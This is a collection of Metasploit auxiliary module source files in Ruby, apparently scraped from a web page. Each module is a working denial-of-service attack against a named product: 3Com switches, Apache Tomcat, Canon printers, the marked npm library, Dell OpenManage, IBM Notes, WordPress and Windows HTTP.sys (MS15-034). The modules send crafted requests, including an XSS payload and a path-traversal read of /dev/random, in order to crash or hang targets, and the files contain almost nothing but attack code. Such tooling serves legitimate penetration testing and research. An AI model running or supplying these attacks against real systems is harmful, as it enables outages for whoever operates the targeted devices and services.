<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => '3Com SuperStack Switch Denial of Service',<br /> 'Description' => %q{<br /> This module causes a temporary denial of service condition<br /> against 3Com SuperStack switches. By sending excessive data<br /> to the HTTP Management interface, the switch stops responding<br /> temporarily. The device does not reset. Tested successfully<br /> against a 3300SM firmware v2.66. Reported to affect versions<br /> prior to v2.72.<br /> },<br /> 'Author' => [ 'aushack' ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> # aushack - I am not sure if these are correct, but the closest match!<br /> [ 'OSVDB', '7246' ],<br /> [ 'CVE', '2004-2691' ],<br /> [ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],<br /> ],<br /> 'DisclosureDate' => '2004-06-24'))<br /><br /> register_options( [ Opt::RPORT(80) ])<br /> end<br /><br /> def run<br /> begin<br /> connect<br /> print_status("Sending DoS packet to #{rhost}:#{rport}")<br /><br /> sploit = "GET / HTTP/1.0\r\n"<br /> sploit << "Referer: " + Rex::Text.rand_text_alpha(1) * 128000<br /><br /> sock.put(sploit +"\r\n\r\n")<br /> disconnect<br /> print_error("DoS packet unsuccessful")<br /> rescue ::Rex::ConnectionRefused<br /> print_error("Unable to connect to #{rhost}:#{rport}")<br /> rescue ::Errno::ECONNRESET<br /> print_good("DoS packet successful. #{rhost} not responding.")<br /> end<br /><br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Apache Tomcat Transfer-Encoding Information Disclosure and DoS',<br /> 'Description' => %q{<br /> Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not<br /> properly handle an invalid Transfer-Encoding header, which allows remote attackers<br /> to cause a denial of service (application outage) or obtain sensitive information<br /> via a crafted header that interferes with "recycling of a buffer."<br /> },<br /> 'Author' =><br /> [<br /> 'Steve Jones', # original discoverer<br /> 'Hoagie <andi[at]void.at>', # original public exploit<br /> 'Paulino Calderon <calderon[at]websec.mx>', # metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> [ 'CVE', '2010-2227' ],<br /> [ 'OSVDB', '66319' ],<br /> [ 'BID', '41544' ]<br /> ],<br /> 'DisclosureDate' => '2010-07-09'))<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8000),<br /> OptInt.new('RLIMIT', [ true, "Number of requests to send", 25])<br /> ])<br /> end<br /><br /> def run<br /> for x in 1..datastore['RLIMIT']<br /> begin<br /> connect<br /> print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")<br /><br /> sploit = "POST / HTTP/1.1\r\n"<br /> sploit << "Host: " + rhost + "\r\n"<br /> sploit << "Transfer-Encoding: buffered\r\n"<br /> sploit << "Content-Length: 65537\r\n\r\n"<br /> sploit << Rex::Text.rand_text_alpha(1) * 65537<br /><br /> sock.put(sploit + "\r\n\r\n")<br /> disconnect<br /><br /> print_error("DoS packet unsuccessful")<br /> rescue ::Rex::ConnectionRefused<br /> print_error("Unable to connect to #{rhost}:#{rport}")<br /> rescue ::Errno::ECONNRESET<br /> print_good("DoS packet successful. #{rhost} not responding.")<br /> rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout<br /> print_error("Couldn't connect to #{rhost}:#{rport}")<br /> rescue ::Timeout::Error, ::Errno::EPIPE<br /> end<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Canon Wireless Printer Denial Of Service',<br /> 'Description' => %q{<br /> The HTTP management interface on several models of Canon Wireless printers<br /> allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:<br /> if this module is successful, the device can only be recovered with a physical<br /> power cycle.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' =><br /> [<br /> 'Matt "hostess" Andreko <mandreko[at]accuvant.com>'<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2013-4615' ],<br /> [ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']<br /> ],<br /> 'DisclosureDate' => '2013-06-18'))<br /> end<br /><br /> def is_alive?<br /> res = send_request_raw({<br /> 'method' => 'GET',<br /> 'uri' => '/',<br /> },10)<br /><br /> return !res.nil?<br /> end<br /><br /> def run<br /><br /> begin<br /><br /> # The first request will set the new IP<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => '/English/pages_MacUS/cgi_lan.cgi',<br /> 'data' => 'OK.x=61' +<br /> '&OK.y=12' +<br /> '&LAN_OPT1=2' +<br /> '&LAN_TXT1=Wireless' +<br /> '&LAN_OPT3=1' +<br /> '&LAN_TXT21=192' +<br /> '&LAN_TXT22=168' +<br /> '&LAN_TXT23=1' +<br /> '&LAN_TXT24=114"><script>alert(\'xss\');</script>' +<br /> '&LAN_TXT31=255' +<br /> '&LAN_TXT32=255' +<br /> '&LAN_TXT33=255' +<br /> '&LAN_TXT34=0' +<br /> '&LAN_TXT41=192' +<br /> '&LAN_TXT42=168' +<br /> '&LAN_TXT43=1' +<br /> '&LAN_TXT44=1' +<br /> '&LAN_OPT2=4' +<br /> '&LAN_OPT4=1' +<br /> '&LAN_HID1=1'<br /> })<br /><br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE<br /> print_error("Couldn't connect to #{rhost}:#{rport}")<br /> return<br /> end<br /><br /> # The second request will load the network options page, which seems to trigger the DoS<br /> send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => '/English/pages_MacUS/lan_set_content.html'<br /> },5) #default timeout, we don't care about the response<br /><br /> # Check to see if it worked or not<br /> if is_alive?<br /> print_error("#{rhost}:#{rport} - Server is still alive")<br /> else<br /> print_good("#{rhost}:#{rport} - Connection Refused: Success!")<br /> end<br /><br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'marked npm module "heading" ReDoS',<br /> 'Description' => %q{<br /> This module exploits a Regular Expression Denial of Service vulnerability<br /> in the npm module "marked". The vulnerable portion of code that this module<br /> targets is in the "heading" regular expression. Web applications that use<br /> "marked" for generating html from markdown are vulnerable. Versions up to<br /> 0.4.0 are vulnerable.<br /> },<br /> 'References' =><br /> [<br /> ['URL', 'https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not'],<br /> ['CWE', '400']<br /> ],<br /> 'Author' =><br /> [<br /> 'Adam Cazzolla, Sonatype Security Research',<br /> 'Nick Starke, Sonatype Security Research'<br /> ],<br /> 'License' => MSF_LICENSE<br /> ))<br /><br /> register_options([<br /> Opt::RPORT(80),<br /> OptString.new('HTTP_METHOD', [true, 'The default HTTP Verb to use', 'GET']),<br /> OptString.new('HTTP_PARAMETER', [true, 'The vulnerable HTTP parameters', '']),<br /> OptString.new('TARGETURI', [true, 'The URL Path to use', '/'])<br /> ])<br /> end<br /><br /> def run<br /> if test_service<br /> trigger_redos<br /> test_service_unresponsive<br /> else<br /> fail_with(Failure::Unreachable, "#{peer} - Could not communicate with service.")<br /> end<br /> end<br /><br /> def trigger_redos<br /> begin<br /> print_status("Sending ReDoS request to #{peer}.")<br /><br /> params = {<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => datastore['HTTP_METHOD'],<br /> ("vars_#{datastore['HTTP_METHOD'].downcase}") => {<br /> datastore['HTTP_PARAMETER'] => "# #" + (" " * 20 * 1024) + Rex::Text.rand_text_alpha(1)<br /> }<br /> }<br /><br /> res = send_request_cgi(params)<br /><br /> if res<br /> fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.")<br /> end<br /><br /> print_status("No response received from #{peer}, service is most likely unresponsive.")<br /> rescue ::Rex::ConnectionRefused<br /> print_error("Unable to connect to #{peer}.")<br /> rescue ::Timeout::Error<br /> print_status("No HTTP response received from #{peer}, this indicates the payload was successful.")<br /> end<br /> end<br /><br /> def test_service_unresponsive<br /> begin<br /> print_status('Testing for service unresponsiveness.')<br /><br /> res = send_request_cgi({<br /> 'uri' => '/' + Rex::Text.rand_text_alpha(8),<br /> 'method' => 'GET'<br /> })<br /><br /> if res.nil?<br /> print_good('Service not responding.')<br /> else<br /> print_error('Service responded with a valid HTTP Response; ReDoS attack failed.')<br /> end<br /> rescue ::Rex::ConnectionRefused<br /> print_error('An unknown error occurred.')<br /> rescue ::Timeout::Error<br /> print_good('HTTP request timed out, most likely the ReDoS attack was successful.')<br /> end<br /> end<br /><br /> def test_service<br /> begin<br /> print_status('Testing Service to make sure it is working.')<br /><br /> res = send_request_cgi({<br /> 'uri' => '/' + Rex::Text.rand_text_alpha(8),<br /> 'method' => 'GET'<br /> })<br /><br /> if res && res.code >= 100 && res.code < 500<br /> print_status("Test request successful, attempting to send payload. Server returned #{res.code}")<br /> return true<br /> else<br /> return false<br /> end<br /> rescue ::Rex::ConnectionRefused<br /> print_error("Unable to connect to #{peer}.")<br /> return false<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',<br /> 'Description' => %q{<br /> This module exploits a heap overflow in the Dell OpenManage<br /> Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability<br /> exists due to a boundary error within the handling of POST requests,<br /> where the application input is set to an overly long file name.<br /> This module will crash the web server, however it is likely exploitable<br /> under certain conditions.<br /> },<br /> 'Author' => [ 'aushack' ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html' ],<br /> [ 'BID', '9750' ],<br /> [ 'OSVDB', '4077' ],<br /> [ 'CVE', '2004-0331' ],<br /> ],<br /> 'DisclosureDate' => '2004-02-26'))<br /><br /> register_options(<br /> [<br /> Opt::RPORT(1311),<br /> OptBool.new('SSL', [true, 'Use SSL', true]),<br /> ],<br /> self.class)<br /> end<br /><br /> def run<br /> connect<br /><br /> foo = "user=user&password=password&domain=domain&application=" + Rex::Text.pattern_create(2000)<br /><br /> sploit = "POST /servlet/LoginServlet?flag=true HTTP/1.0\r\n"<br /> sploit << "Content-Length: #{foo.length}\r\n\r\n"<br /> sploit << foo<br /><br /> sock.put(sploit +"\r\n\r\n")<br /><br /> disconnect<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',<br /> 'Description' => %q{<br /> This module triggers an infinite loop in Apache Commons FileUpload 1.0<br /> through 1.3 via a specially crafted Content-Type header.<br /> Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle<br /> mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50<br /> and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also<br /> uses Commons FileUpload as part of the Manager application.<br /> },<br /> 'Author' =><br /> [<br /> 'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.<br /> 'ribeirux' # metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> ['CVE', '2014-0050'],<br /> ['URL', 'https://tomcat.apache.org/security-8.html'],<br /> ['URL', 'https://tomcat.apache.org/security-7.html']<br /> ],<br /> 'DisclosureDate' => '2014-02-06'<br /> ))<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('TARGETURI', [ true, "The request URI", '/']),<br /> OptInt.new('RLIMIT', [ true, "Number of requests to send",50])<br /> ])<br /> end<br /><br /> def run<br /> boundary = "0"*4092<br /> opts = {<br /> 'method' => "POST",<br /> 'uri' => normalize_uri(target_uri.to_s),<br /> 'ctype' => "multipart/form-data; boundary=#{boundary}",<br /> 'data' => "#{boundary}00000",<br /> 'headers' => {<br /> 'Accept' => '*/*'<br /> }<br /> }<br /><br /> # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby<br /> # This should be rewritten with 1.upto() or Enumerable#each or<br /> # something<br /> for x in 1..datastore['RLIMIT']<br /> print_status("Sending request #{x} to #{peer}")<br /> begin<br /> c = connect<br /> r = c.request_cgi(opts)<br /> c.send_request(r)<br /> # Don't wait for a response<br /> rescue ::Rex::ConnectionError => exception<br /> print_error("Unable to connect: '#{exception.message}'")<br /> return<br /> ensure<br /> disconnect(c) if c<br /> end<br /> end<br /> end<br />end<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpServer<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => "IBM Notes encodeURI DOS",<br /> 'Description' => %q(<br /> This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.<br /> If successful, it could cause the Notes client to hang and have to be restarted.<br /> ),<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Dhiraj Mishra',<br /> ],<br /> 'References' => [<br /> [ 'EDB', '42602'],<br /> [ 'CVE', '2017-1129' ],<br /> [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]<br /> ],<br /> 'DisclosureDate' => '2017-08-31',<br /> 'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],<br /> 'PassiveActions' => [ 'WebServer' ],<br /> 'DefaultAction' => 'WebServer'<br /> )<br /> )<br /> end<br /><br /> def run<br /> exploit # start http server<br /> end<br /><br /> def setup<br /> @html = %|<br /> <html><head><title>DOS</title><br /><script type="text/javascript"><br />while (true) try {<br /> var object = { };<br /> function d(d0) {<br /> var d0 = (object instanceof encodeURI)('foo');<br /> }<br /> d(75);<br /> } catch (d) { }<br /></script><br /></head></html><br /> |<br /> end<br /><br /> def on_request_uri(cli, _request)<br /> print_status('Sending response')<br /> send_response(cli, @html)<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HTTP::Wordpress<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Wordpress XMLRPC DoS',<br /> 'Description' => %q{<br /> Wordpress XMLRPC parsing is vulnerable to a XML based denial of service.<br /> This vulnerability affects Wordpress 3.5 - 3.9.2 (3.8.4 and 3.7.4 are<br /> also patched).<br /> },<br /> 'Author' =><br /> [<br /> 'Nir Goldshlager', # advisory<br /> 'Christian Mehlmauer' # metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> ['CVE', '2014-5266'],<br /> ['URL', 'https://wordpress.org/news/2014/08/wordpress-3-9-2/'],<br /> ['URL', 'http://www.breaksec.com/?p=6362'],<br /> ['URL', 'https://mashable.com/archive/wordpress-xml-blowup-dos'],<br /> ['URL', 'https://core.trac.wordpress.org/changeset/29404'],<br /> ['WPVDB', '7526']<br /> ],<br /> 'DisclosureDate'=> '2014-08-06'<br /> ))<br /><br /> register_options(<br /> [<br /> OptInt.new('RLIMIT', [ true, "Number of requests to send", 1000 ])<br /> ])<br /><br /> register_advanced_options(<br /> [<br /> OptInt.new('FINGERPRINT_STEP', [true, "The stepsize in MB when fingerprinting", 8]),<br /> OptInt.new('DEFAULT_LIMIT', [true, "The default limit in MB", 8])<br /> ])<br /> end<br /><br /> def rlimit<br /> datastore['RLIMIT']<br /> end<br /><br /> def default_limit<br /> datastore['DEFAULT_LIMIT']<br /> end<br /><br /> def fingerprint_step<br /> datastore['FINGERPRINT_STEP']<br /> end<br /><br /> def fingerprint<br /> memory_to_use = fingerprint_step<br /> # try out the available memory in steps<br /> # apache will return a server error if the limit is reached<br /> while memory_to_use < 1024<br /> vprint_status("trying memory limit #{memory_to_use}MB")<br /> opts = {<br /> 'method' => 'POST',<br /> 'uri' => wordpress_url_xmlrpc,<br /> 'data' => generate_xml(memory_to_use),<br /> 'ctype' =>'text/xml'<br /> }<br /><br /> begin<br /> # low timeout because the server error is returned immediately<br /> res = send_request_cgi(opts, timeout = 3)<br /> rescue ::Rex::ConnectionError => exception<br /> print_error("unable to connect: '#{exception.message}'")<br /> break<br /> end<br /><br /> if res && res.code == 500<br /> # limit reached, return last limit<br /> last_limit = memory_to_use - fingerprint_step<br /> vprint_status("got an error - using limit #{last_limit}MB")<br /> return last_limit<br /> else<br /> memory_to_use += fingerprint_step<br /> end<br /> end<br /><br /> # no limit can be determined<br /> print_warning("can not determine limit, will use default of #{default_limit}")<br /> return default_limit<br /> end<br /><br /> def generate_xml(size)<br /> entity = Rex::Text.rand_text_alpha(3)<br /> doctype = Rex::Text.rand_text_alpha(6)<br /> param_value_1 = Rex::Text.rand_text_alpha(5)<br /> param_value_2 = Rex::Text.rand_text_alpha(5)<br /><br /> size_bytes = size * 1024<br /><br /> # Wordpress only resolves one level of entities so we need<br /> # to specify one long entity and reference it multiple times<br /> xml = '<?xml version="1.0" encoding="iso-8859-1"?>'<br /> xml << "<!DOCTYPE %{doctype} ["<br /> xml << "<!ENTITY %{entity} \"%{entity_value}\">"<br /> xml << ']>'<br /> xml << '<methodCall>'<br /> xml << '<methodName>'<br /> xml << "%{payload}"<br /> xml << '</methodName>'<br /> xml << '<params>'<br /> xml << "<param><value>%{param_value_1}</value></param>"<br /> xml << "<param><value>%{param_value_2}</value></param>"<br /> xml << '</params>'<br /> xml << '</methodCall>'<br /><br /> empty_xml = xml % {<br /> :doctype => '',<br /> :entity => '',<br /> :entity_value => '',<br /> :payload => '',<br /> :param_value_1 => '',<br /> :param_value_2 => ''<br /> }<br /><br /> space_to_fill = size_bytes - empty_xml.size<br /> vprint_status("max XML space to fill: #{space_to_fill} bytes")<br /><br /> payload = "&#{entity};" * (space_to_fill / 6)<br /> entity_value_length = space_to_fill - payload.length<br /><br /> payload_xml = xml % {<br /> :doctype => doctype,<br /> :entity => entity,<br /> :entity_value => Rex::Text.rand_text_alpha(entity_value_length),<br /> :payload => payload,<br /> :param_value_1 => param_value_1,<br /> :param_value_2 => param_value_2<br /> }<br /><br /> payload_xml<br /> end<br /><br /> def run<br /> # get the max size<br /> print_status("trying to fingerprint the maximum memory we could use")<br /> size = fingerprint<br /> print_status("using #{size}MB as memory limit")<br /><br /> # only generate once<br /> xml = generate_xml(size)<br /><br /> for x in 1..rlimit<br /> print_status("sending request ##{x}...")<br /> opts = {<br /> 'method' => 'POST',<br /> 'uri' => wordpress_url_xmlrpc,<br /> 'data' => xml,<br /> 'ctype' =>'text/xml'<br /> }<br /> begin<br /> c = connect<br /> r = c.request_cgi(opts)<br /> c.send_request(r)<br /> # Don't wait for a response, can take very long<br /> rescue ::Rex::ConnectionError => exception<br /> print_error("unable to connect: '#{exception.message}'")<br /> return<br /> ensure<br /> disconnect(c) if c<br /> end<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /><br /> # Watch out, dos all the things<br /> include Msf::Auxiliary::Scanner<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service',<br /> 'Description' => %q{<br /> This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a<br /> vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code<br /> execution. This module will try to cause a denial-of-service.<br /> },<br /> 'Author' =><br /> [<br /> # Bill did all the work (see the pastebin code), twitter: @hectorh56193716<br /> 'Bill Finlayson',<br /> # MSF. But really, these people made it happen:<br /> # https://github.com/rapid7/metasploit-framework/pull/5150<br /> 'sinn3r'<br /> ],<br /> 'References' =><br /> [<br /> ['CVE', '2015-1635'],<br /> ['MSB', 'MS15-034'],<br /> ['URL', 'https://pastebin.com/ypURDPc4'],<br /> ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5150'],<br /> ['URL', 'https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection'],<br /> ['URL', 'http://www.securitysift.com/an-analysis-of-ms15-034/']<br /> ],<br /> 'License' => MSF_LICENSE<br /> ))<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [false, 'URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)', '/'])<br /> ])<br /> end<br /><br /> def upper_range<br /> 0xFFFFFFFFFFFFFFFF<br /> end<br /><br /> def run_host(ip)<br /> if check_host(ip) == Exploit::CheckCode::Vulnerable<br /> dos_host(ip)<br /> else<br /> print_status("Probably not vulnerable, will not dos it.")<br /> end<br /> end<br /><br /> # Needed to allow the vulnerable uri to be shared between the #check and #dos<br /> def target_uri<br /> @target_uri ||= super<br /> end<br /><br /> def get_file_size(ip)<br /> @file_size ||= lambda {<br /> file_size = -1<br /> uri = normalize_uri(target_uri.path)<br /> res = send_request_raw('uri' => uri)<br /><br /> unless res<br /> vprint_error("Connection timed out")<br /> return file_size<br /> end<br /><br /> if res.code == 404<br /> vprint_error("You got a 404. URI must be a valid resource.")<br /> return file_size<br /> end<br /><br /> file_size = res.body.length<br /> vprint_status("File length: #{file_size} bytes")<br /><br /> return file_size<br /> }.call<br /> end<br /><br /> def dos_host(ip)<br /> file_size = get_file_size(ip)<br /> lower_range = file_size - 2<br /><br /> # In here we have to use Rex because if we dos it, it causes our module to hang too<br /> uri = normalize_uri(target_uri.path)<br /> begin<br /> cli = Rex::Proto::Http::Client.new(ip)<br /> cli.connect<br /> req = cli.request_raw(<br /> 'uri' => uri,<br /> 'method' => 'GET',<br /> 'headers' => {<br /> 'Range' => "bytes=#{lower_range}-#{upper_range}"<br /> }<br /> )<br /> cli.send_request(req)<br /> rescue ::Errno::EPIPE, ::Timeout::Error<br /> # Same exceptions the HttpClient mixin catches<br /> end<br /> print_status("DOS request sent")<br /> end<br /><br /> def potential_static_files_uris<br /> uri = normalize_uri(target_uri.path)<br /><br /> return [uri] unless uri[-1, 1] == '/'<br /><br /> uris = ["#{uri}welcome.png"]<br /> res = send_request_raw('uri' => uri, 'method' => 'GET')<br /><br /> return uris unless res<br /><br /> site_uri = URI.parse(full_uri)<br /> page = Nokogiri::HTML(res.body.encode('UTF-8', invalid: :replace, undef: :replace))<br /><br /> page.xpath('//link|//script|//style|//img').each do |tag|<br /> %w(href src).each do |attribute|<br /> attr_value = tag[attribute]<br /><br /> next unless attr_value && !attr_value.empty?<br /><br /> uri = site_uri.merge(URI::DEFAULT_PARSER.escape(attr_value.strip))<br /><br /> next unless uri.host == vhost || uri.host == rhost<br /><br /> uris << uri.path if uri.path =~ /\.[a-z]{2,}$/i # Only keep path with a file<br /> end<br /> end<br /><br /> uris.uniq<br /> end<br /><br /> def check_host(ip)<br /> potential_static_files_uris.each do |potential_uri|<br /> uri = normalize_uri(potential_uri)<br /><br /> res = send_request_raw(<br /> 'uri' => uri,<br /> 'method' => 'GET',<br /> 'headers' => {<br /> 'Range' => "bytes=0-#{upper_range}"<br /> }<br /> )<br /><br /> vmessage = "#{peer} - Checking #{uri}"<br /><br /> if res && res.body.include?('Requested Range Not Satisfiable')<br /> vprint_status("#{vmessage} [#{res.code}] - Vulnerable")<br /><br /> target_uri.path = uri # Needed for the DoS attack<br /><br /> return Exploit::CheckCode::Vulnerable<br /> elsif res && res.body.include?('The request has an invalid header name')<br /> vprint_status("#{vmessage} [#{res.code}] - Safe")<br /><br /> return Exploit::CheckCode::Safe<br /> else<br /> vprint_status("#{vmessage} - Unknown")<br /> end<br /> end<br /><br /> Exploit::CheckCode::Unknown<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HTTP::Wordpress<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(<br /> info,<br /> 'Name' => 'WordPress Traversal Directory DoS',<br /> 'Description' => %q{<br /> Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin<br /> function in wp-admin/includes/ajax-actions.php in WordPress before 4.6<br /> allows remote attackers to hijack the authentication of subscribers<br /> for /dev/random read operations by leveraging a late call to<br /> the check_ajax_referer function, a related issue to CVE-2016-6896.},<br /> 'License' => MSF_LICENSE,<br /> 'Author' =><br /> [<br /> 'Yorick Koster', # Vulnerability disclosure<br /> 'CryptisStudents' # Metasploit module<br /> ],<br /> 'References' =><br /> [<br /> ['CVE', '2016-6897'],<br /> ['EDB', '40288'],<br /> ['OVE', 'OVE-20160712-0036']<br /> ],<br /> ))<br /><br /> register_options(<br /> [<br /> OptInt.new('RLIMIT', [true, 'The number of requests to send', 200]),<br /> OptInt.new('THREADS', [true, 'The number of concurrent threads', 5]),<br /> OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 5]),<br /> OptInt.new('DEPTH', [true, 'The depth of the path', 10]),<br /> OptString.new('USERNAME', [true, 'The username to send the requests with', '']),<br /> OptString.new('PASSWORD', [true, 'The password to send the requests with', ''])<br /> ])<br /> end<br /><br /> def rlimit<br /> datastore['RLIMIT']<br /> end<br /><br /> def username<br /> datastore['USERNAME']<br /> end<br /><br /> def password<br /> datastore['PASSWORD']<br /> end<br /><br /> def thread_count<br /> datastore['THREADS']<br /> end<br /><br /> def timeout<br /> datastore['TIMEOUT']<br /> end<br /><br /> def depth<br /> datastore['DEPTH']<br /> end<br /><br /> def user_exists(user)<br /> exists = wordpress_user_exists?(user)<br /> if exists<br /> print_good("Username \"#{user}\" is valid")<br /> return true<br /> else<br /> print_error("\"#{user}\" is not a valid username")<br /> return false<br /> end<br /> end<br /><br /> def run<br /> if wordpress_and_online?<br /> print_status("Checking if user \"#{username}\" exists...")<br /> unless user_exists(username)<br /> print_error('Aborting operation - a valid username must be specified')<br /> return<br /> end<br /><br /> starting_thread = 1<br /><br /> cookie = wordpress_login(username, password)<br /> store_valid_credential(user: username, private: password, proof: cookie)<br /> if cookie.nil?<br /> print_error('Aborting operation - failed to authenticate')<br /> return<br /> end<br /><br /> path = "/#{'../' * depth}dev/random"<br /><br /> while starting_thread < rlimit do<br /> ubound = [rlimit - (starting_thread - 1), thread_count].min<br /> print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...")<br /><br /> threads = []<br /> 1.upto(ubound) do |i|<br /> threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|<br /> begin<br /> # shell code<br /> res = send_request_cgi( opts = {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),<br /> 'vars_post' => {<br /> 'action' => 'update-plugin',<br /> 'plugin' => path<br /> },<br /> 'cookie' => cookie<br /> }, timeout = 0.2)<br /> rescue => e<br /> print_error("Timed out during request #{(starting_thread - 1) + i}")<br /> end<br /> end<br /> end<br /><br /> threads.each(&:join)<br /><br /> print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}")<br /> starting_thread += ubound<br /> end<br /><br /> if wordpress_and_online?<br /> print_error("FAILED: #{target_uri} appears to still be online")<br /> else<br /> print_good("SUCCESS: #{target_uri} appears to be down")<br /> end<br /><br /> else<br /> print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress")<br /> end<br /> end<br />end<br /></code></pre>